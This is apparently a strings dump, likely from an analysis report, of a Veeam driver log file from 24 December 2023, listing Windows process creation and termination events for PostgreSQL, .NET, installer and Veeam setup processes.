Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:37.426] [8a0:22c: 00] DETAIL: VS_PS: process creation: 61c, parent = 8a0, image filename: "\Device\HarddiskVolume2\Windows\System32\audiodg.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:11.571] [1e00:1844: 00] DETAIL: VS_PS: process creation: e7c, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.020] [22c8:125c: 00] DETAIL: VS_PS: process creation: 220c, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.696] [318:e98: 00] DETAIL: VS_PS: process creation: 1550, parent = 318, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:52.724] [1e00:1844: 00] DETAIL: VS_PS: process creation: 6dc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:17.977] [15fc:22d8: 00] DETAIL: VS_PS: process termination: 15fc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:58.033] [ea0:179c: 00] DETAIL: VS_PS: process termination: ea0, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.981] [1aac:1b58: 00] DETAIL: VS_PS: process termination: 1aac, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:54:46.779] [1b24:1750: 00] DETAIL: VS_PS: process termination: 1b24, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.931] [1e00:1844: 00] DETAIL: VS_PS: process creation: 780, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.341] [1aa4:544: 00] DETAIL: VS_PS: process creation: 1fc0, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:27.774] [23a4:18ac: 00] DETAIL: VS_PS: process creation: ac8, parent = 23a4, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Microsoft\Edge\Application\msedge.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.490] [170c:1cc8: 00] DETAIL: VS_PS: process creation: 5e4, parent = 170c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.352] [2028:10d8: 00] DETAIL: VS_PS: process creation: 1b4, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.182] [c10:588: 00] DETAIL: VS_PS: process creation: 638, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.775] [938:192c: 00] DETAIL: VS_PS: process termination: 938, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:01.789] [1f1c:1038: 00] DETAIL: VS_PS: process termination: 1f1c, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.250] [17d8:fa0: 00] DETAIL: VS_PS: process termination: 17d8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:00.108] [340:1e0c: 00] DETAIL: VS_PS: process creation: 1290, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:54:16.746] [1e00:1844: 00] DETAIL: VS_PS: process creation: 7a0, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.649] [170c:1cc8: 00] DETAIL: VS_PS: process termination: 170c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.632] [1ef8:2164: 00] DETAIL: VS_PS: process creation: e28, parent = 1ef8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.245] [1b0:2380: 00] DETAIL: VS_PS: process termination: 1b0, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:28.555] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1a78, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.105] [f24:12a8: 00] DETAIL: VS_PS: process creation: 160, parent = f24, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:24.121] [1950:239c: 00] DETAIL: VS_PS: process termination: 1950, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.680] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1e40, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.704] [1ef8:2164: 00] DETAIL: VS_PS: process termination: 1ef8, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.973] [22c8:125c: 00] DETAIL: VS_PS: process creation: 1ab4, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.498] [1168:a14: 00] DETAIL: VS_PS: process termination: 1168, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.452] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 170c, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:58.552] [1748:2070: 00] DETAIL: VS_PS: process termination: 1748, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:49.155] [764:2294: 00] DETAIL: VS_PS: process termination: 764, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:46.523] [2220:604: 00] DETAIL: VS_PS: process termination: 2220, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.967] [f04:1c84: 00] DETAIL: VS_PS: process creation: 82c, parent = f04, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:56.590] [1e00:1844: 00] DETAIL: VS_PS: process creation: 17d0, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:05.358] [1914:16c4: 00] DETAIL: VS_PS: process termination: 1914, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.482] [10a4:8ac: 00] DETAIL: VS_PS: process creation: 1e4, parent = 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.562] [69c:193c: 00] DETAIL: VS_PS: process creation: b04, parent = 69c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.552] [1e4:1678: 00] DETAIL: VS_PS: process termination: 1e4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.347] [10bc:b6c: 00] DETAIL: VS_PS: process creation: 1168, parent = 10bc, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.663] [934:2388: 00] DETAIL: VS_PS: process termination: 934, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.961] [1e00:1844: 00] DETAIL: VS_PS: process creation: 438, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.737] [1a68:1ee8: 00] DETAIL: VS_PS: process termination: 1a68, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:47.224] [62c:13cc: 00] DETAIL: VS_PS: process termination: 62c, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchProtocolHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:22.230] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1960, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.875] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1290, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:26.743] [16a8:173c: 00] DETAIL: VS_PS: process creation: 1c3c, parent = 16a8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:17.051] [e7c:850: 00] DETAIL: VS_PS: process termination: e7c, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.361] [1e00:1844: 00] DETAIL: VS_PS: process creation: 5bc, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.082] [ce0:17c4: 00] DETAIL: VS_PS: process creation: 128, parent = ce0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:46.105] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1ab4, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.865] [1db0:14c8: 00] DETAIL: VS_PS: process creation: 4c8, parent = 1db0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.081] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 1984, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.118] [f24:12a8: 00] DETAIL: VS_PS: process termination: f24, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.096] [128:1a00: 00] DETAIL: VS_PS: process termination: 128, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:15.062] [ad4:fa4: 00] DETAIL: VS_PS: process creation: 22bc, parent = ad4, image filename: "\Device\HarddiskVolume2\Users\tt\AppData\Local\Temp\7f798fe1-87c1-4011-9791-a57ca622e2f9\RPCAssemblyServer.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:17.242] [450:1f54: 00] DETAIL: VS_PS: process creation: 1e58, parent = 450, image filename: "\Device\HarddiskVolume2\Users\tt\AppData\Local\Temp\df48baea-8e6f-4777-99e1-c16ec92335de\RPCAssemblyServer.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:33.823] [77c:850: 00] DETAIL: VS_PS: process termination: 77c, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.016] [1008:430: 00] DETAIL: VS_PS: process termination: 1008, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:06.668] [6d0:330: 00] DETAIL: VS_PS: process termination: 6d0, image filename: "\Device\HarddiskVolume2\Windows\System32\UsoClient.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.965] [2394:23b0: 00] DETAIL: VS_PS: process termination: 2394, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.075] [1708:10e0: 00] DETAIL: VS_PS: process termination: 1708, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:06.848] [22bc:17b4: 00] DETAIL: VS_PS: process creation: 14f0, parent = 22bc, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.370] [1b4:6f4: 00] DETAIL: VS_PS: process termination: 1b4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:37.132] [2b8:18c8: 00] DETAIL: VS_PS: process creation: 21e4, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.672] [1aa4:1e98: 00] DETAIL: VS_PS: process creation: 22c8, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.203] [99c:684: 00] DETAIL: VS_PS: process creation: 1f08, parent = 99c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.120] [160:1a14: 00] DETAIL: VS_PS: process termination: 160, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.013] [1ab4:18f0: 00] DETAIL: VS_PS: process termination: 1ab4, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.712] [1798:7e8: 00] DETAIL: VS_PS: process creation: 2274, parent = 1798, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:43.684] [2b8:176c: 00] DETAIL: VS_PS: process creation: 1c10, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.805] [1e40:17d0: 00] DETAIL: VS_PS: process termination: 1e40, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:05.322] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1914, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:44.003] [340:20d4: 00] DETAIL: VS_PS: process creation: 8dc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.435] [1168:220c: 00] DETAIL: VS_PS: process termination: 1168, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.168] [201c:1a2c: 00] DETAIL: VS_PS: process creation: e84, parent = 201c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.489] [9e8:6d0: 00] DETAIL: VS_PS: process termination: 9e8, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.013] [1e64:16b0: 00] DETAIL: VS_PS: process creation: b08, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:54:46.745] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1b24, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.931] [22c8:125c: 00] DETAIL: VS_PS: process creation: 2394, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:40.865] [340:14a8: 00] DETAIL: VS_PS: process creation: 494, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.829] [318:828: 00] DETAIL: VS_PS: process creation: 608, parent = 318, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.143] [1e64:16b0: 00] DETAIL: VS_PS: process creation: 1b0, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:47.232] [1b5c:1760: 00] DETAIL: VS_PS: process termination: 1b5c, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchFilterHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.230] [1b5c:cc8: 00] DETAIL: VS_PS: process termination: 1b5c, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.103] [11c0:239c: 00] DETAIL: VS_PS: process termination: 11c0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.395] [5bc:440: 00] DETAIL: VS_PS: process termination: 5bc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.071] [2364:1798: 00] DETAIL: VS_PS: process termination: 2364, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:02.001] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1f14, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.485] [a0c:20e8: 00] DETAIL: VS_PS: process creation: 1314, parent = a0c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.694] [1454:1308: 00] DETAIL: VS_PS: process creation: 938, parent = 1454, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.800] [340:b4c: 00] DETAIL: VS_PS: process creation: 1ba8, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:06.449] [1730:7ec: 00] DETAIL: VS_PS: process termination: 1730, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.198] [638:ff4: 00] DETAIL: VS_PS: process termination: 638, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:36.422] [1c1c:74c: 00] DETAIL: VS_PS: process termination: 1c1c, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:47.402] [1e00:1844: 00] DETAIL: VS_PS: process creation: a34, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:40.778] [12e0:24c: 00] DETAIL: VS_PS: process termination: 12e0, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.627] [fcc:6e0: 00] DETAIL: VS_PS: process termination: fcc, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamPSDirectCtrl_X64.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.080] [1f58:149c: 00] DETAIL: VS_PS: process termination: 1f58, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:16.723] [21fc:1eb4: 00] DETAIL: VS_PS: process termination: 21fc, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.358] [1434:74c: 00] DETAIL: VS_PS: process termination: 1434, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.970] [2174:1a88: 00] DETAIL: VS_PS: process termination: 2174, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.179] [201c:1a2c: 00] DETAIL: VS_PS: process termination: 201c, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.450] [16c4:1914: 00] DETAIL: VS_PS: process termination: 16c4, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.482] [1b0:1490: 00] DETAIL: VS_PS: process termination: 1b0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:19.450] [2220:1c9c: 00] DETAIL: VS_PS: process termination: 2220, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.061] [1c80:14ec: 00] DETAIL: VS_PS: process creation: 1674, parent = 1c80, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:43.374] [340:8d8: 00] DETAIL: VS_PS: process creation: 16c0, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:06.868] [22c8:125c: 00] DETAIL: VS_PS: process creation: 6dc, parent = 22c8, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\11e8cbe1-0c86-4199-8801-5f78fcc713bb".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.115] [1e00:1844: 00] DETAIL: VS_PS: process creation: 694, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.617] [624:2260: 00] DETAIL: VS_PS: process termination: 624, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.852] [2364:1798: 00] DETAIL: VS_PS: process creation: 1708, parent = 2364, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.634] [1e00:1844: 00] DETAIL: VS_PS: process creation: 9c0, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:46.893] [23ac:1408: 00] DETAIL: VS_PS: process termination: 23ac, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:51:35.337] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1674, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:48:00.535] [170c:1c08: 00] DETAIL: VS_PS: process termination: 170c, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.971] [167c:500: 00] DETAIL: VS_PS: process termination: 167c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.331] [5b4:1744: 00] DETAIL: VS_PS: process termination: 5b4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:53:22.269] [1960:13e0: 00] DETAIL: VS_PS: process termination: 1960, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.993] [438:103c: 00] DETAIL: VS_PS: process termination: 438, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.838] [1454:1308: 00] DETAIL: VS_PS: process termination: 1454, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
